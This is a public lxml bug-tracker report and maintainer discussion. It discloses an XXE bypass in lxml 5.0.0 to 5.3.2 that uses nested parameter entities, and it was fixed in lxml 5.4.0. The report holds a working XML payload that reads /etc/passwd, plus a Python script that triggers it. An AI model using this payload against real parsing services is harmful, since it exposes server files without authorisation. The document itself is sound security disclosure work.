XXE resolve_entities bypass using Parameter Entity

Bug #2107279 reported by Anatoly Katyushin
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
lxml
Fix Released
High
scoder

Bug Description

lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction
Thus the xml below
```
<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE msg [
        <!ENTITY xxe SYSTEM 'file:///etc/passwd'>
    ]>
<msg>&xxe;</msg>
```
will not work without resolve_entities:
```
from lxml import etree

with open('test.xml', 'rb') as f:
    xml_data = f.read()

parser = etree.XMLParser()
root = etree.fromstring(xml_data, parser=parser)

print(etree.tostring(root, pretty_print=True).decode())

```

but libxml doesn't restrict Parameter Entities, that leads to XXE

Thus the xml below
```
<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE msg [
        <!ENTITY % a '
            <!ENTITY &#x25; file SYSTEM "/etc/passwd">
            <!ENTITY &#x25; b "<!ENTITY c &#x27;&#x25;file;&#x27;>">
        '>
        %a;
        %b;

]>
<msg>&c;</msg>
```
works fine
I've tested on python:3.6-3.12, this works for 5.0.0 and till 5.3.2

Revision history for this message
Anatoly Katyushin (heart1ess) wrote :
Revision history for this message
Anatoly Katyushin (heart1ess) wrote :

I'd also request a CVE for this bug, if you don't mind

Revision history for this message
scoder (scoder) wrote :

Thanks for reporting this.

As far as I can see, however, there is nothing specific to lxml in this exploit. It only depends on the libxml2 parser (and version). The binary wheels of lxml 5.3.x use libxml2 2.12.x, which allows this. The binary wheels of lxml 6.0 will come with libxml2 2.13.x (or maybe 2.14.x), which prevents this exploit.

Users of source builds or other binary distributions of lxml may or may not run into this, depending on the libxml2 version that they use. The system libxml2 shipped by the Linux distributions that I tried seems to be safe, for example.

So, I'm not sure this is worth a CVE by itself, given that libxml2 already fixed this last summer.

Changed in lxml:
assignee: nobody → scoder (scoder)
importance: Undecided → Medium
milestone: none → 6.0
status: New → Opinion
Revision history for this message
Anatoly Katyushin (heart1ess) wrote :

I've been using the latest python docker images for testing and it affects most of them (I'll check on 3.13 a bit later), and for this case it looks like the containered systems and projects, that use lxml from 5 to current are all vulnerable, that's why I find it worth a CVE. I'll take a closer look at libxml2 next week, whether they've closed this bug on purpose or by an accident case.
Thanks for your answer

Revision history for this message
Anatoly Katyushin (heart1ess) wrote :

yep, so all images of python till python:3.13 using `pip install lxml` are vulnerable

Revision history for this message
scoder (scoder) wrote :

It's not about the docker images. They all just download and install the binary wheels of lxml that come from PyPI. Those are vulnerable because they statically include and use libxml2 2.12.10 (2.11.9 on Windows).

So, yeah, it's lxml to blame for shipping these library versions. I'll see that I get a 5.3.3 release out that comes with the latest libxml2 2.13.8. lxml 6.0.0 is going to be too disruptive to require it for this kind of issue.

Changed in lxml:
importance: Medium → High
status: Opinion → Confirmed
scoder (scoder)
Changed in lxml:
milestone: 6.0 → 5.4.0
Revision history for this message
scoder (scoder) wrote :

I released lxml 5.4.0 with binary wheels that ship libxml2 2.13.8. That should resolve this issue.

Changed in lxml:
status: Confirmed → Fix Released
Revision history for this message
scoder (scoder) wrote :

Thank you for finding and reporting this issue.

information type: Private Security → Public Security
Revision history for this message
Anatoly Katyushin (heart1ess) wrote :

Great, I've checked, now it works only if entities are turned on =)

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.